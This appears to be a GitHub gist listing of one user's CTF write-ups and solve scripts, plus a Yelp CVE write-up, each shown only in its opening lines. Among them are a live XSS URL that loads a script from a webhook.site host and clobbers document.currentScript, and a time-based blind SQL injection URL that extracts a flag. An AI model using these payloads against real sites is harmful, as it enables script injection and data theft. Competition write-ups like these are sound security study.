parrot409 parrot409

@parrot409
parrot409 / _writeup.md
Created December 14, 2025 17:05
Impossible Leak - SECCON 2025 Quals

XS Leaks using disk cache grooming

The admin bot creates a new browsing context with createBrowsingContext() and uses that to create a page. Each browsing context should have a dedicated disk cache, but how does Chrome handle this? I deduced that it uses an in-memory disk cache, which is much smaller than the default on-disk disk cache. The incognito tab of my browser has the same behavior.

The following page alerts "not cached" due to a cache miss in incognito mode, but no error happens in a regular tab.

$ head /dev/urandom -c 5242880 > chunk
$ cat <<EOF > index.html
@parrot409
parrot409 / alpaca-mark.md
Created May 17, 2025 09:09
AlpacaHack Round 11 solutions

Clobbering document.currentScript.

if (!e && t && (t.currentScript && "SCRIPT" === t.currentScript.tagName.toUpperCase() && (e = t.currentScript.src),
http://34.170.146.252:25903/?markdown=%3C/textarea%3E%3C/form%3E%3Cscript%20src=%22https://webhook.site/ec8dae46-b8ee-44a7-a4a8-d065f047ed60/%22%3E%3C/script%3E%3Cform%20name=%22currentScript%22%3E%3C/form%3E
@parrot409
parrot409 / writeup.md
Last active December 25, 2025 23:33
CVE-2025-3155

Details

Intro

CVE-2025-3155 affects Yelp, which is GNOME's user help application. It's installed by default on Ubuntu desktop.

What is a scheme

A URI scheme is the part of a Uniform Resource Identifier (URI) that identifies the protocol or the specific application that should handle the resource identified by the URI (for example, steam://run/1337). It's the part that comes before the colon (://).

@parrot409
parrot409 / doit.py
Created October 14, 2024 13:23
Blue Water CTF 2024 - bluesocial
#!/usr/bin/env python3
import requests
target = 'http://bluesocial.chal.perfect.blue:25005'
s = requests.session()
s.post(f'{target}/login',data={'username':'home'})
s.post(f'{target}/user/update',data={'bio':"""
<!DOCTYPE html>
<html lang='en'>
<head>
@parrot409
parrot409 / solve.html
Last active January 21, 2024 19:13
Gimme-Content-Type - mapna 2023
<a id=f >sdf</a>
<div id=t >
</div>
<script>
function addFrame(src,h){
let el = document.createElement('iframe')
el.src = src
el.onload = h
t.innerHTML = ''
@parrot409
parrot409 / README.md
Last active September 4, 2023 13:49
corctf 2023 - leakynote & pdfpal

Leaky note

The challenge:

404 page XSLeak SSLeak? challenge, but the session cookie's SameSite attribute is Lax. We have HTML injection in one of the pages, but there is a CSP.

Content-Security-Policy "script-src 'none'; object-src 'none'; frame-ancestors 'none';";
@parrot409
parrot409 / hack.html
Created October 30, 2022 21:37
food-api hack.lu ctf 2022
```html
<script>
const target = 'https://0.0.0.0/api/food/555??=`in()*?;select%20/*--%20%27&b%20%271*/%271%27from%20flag%20where%20randomblob((CASE%20WHEN%20(SUBSTR((SELECT%20flag%20FROM%20flag),IDX,1)%3d%27CHR%27)%20THEN%205000000%20ELSE%201%20END))--=dfdf'
const alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'
var flag = ''
async function atk(){
let tbl = []
for(let i=0;i<alphabet.length;i++){
@parrot409
parrot409 / wow.py
Created September 19, 2022 09:19
0ctf 2022 - jabasass
#!/usr/bin/env python3
# import requests_ as requests
# from requests_.auth import HTTPDigestAuth
# url = 'http://localhost:9990/management-upload'
# r = requests.post(url,headers={'Origin':'http://localhost:9990'},auth=HTTPDigestAuth('admin', 'admin'))
# print(r.text)
import _socket
import math
import hashlib
@parrot409
parrot409 / rem.php
Created December 27, 2021 17:09
SCTF 2021 - christmas-wishes
<?php
function conv($l){
$g = unpack("C*", pack("Q",$l));
$r = "";
for($i=0;$i<8;$i++){
if($g[$i] != 0){
$r.= chr($g[$i]);
}
}
return $r;
@parrot409
parrot409 / rem.html
Last active December 14, 2021 14:11
X-note writeup - SECCON CTF 2021
<html>
<head>
<title>rem rem rem</title>
</head>
<body>
<div id="atk">
</div>
<script>
// const TARGET = "http://localhost:8000"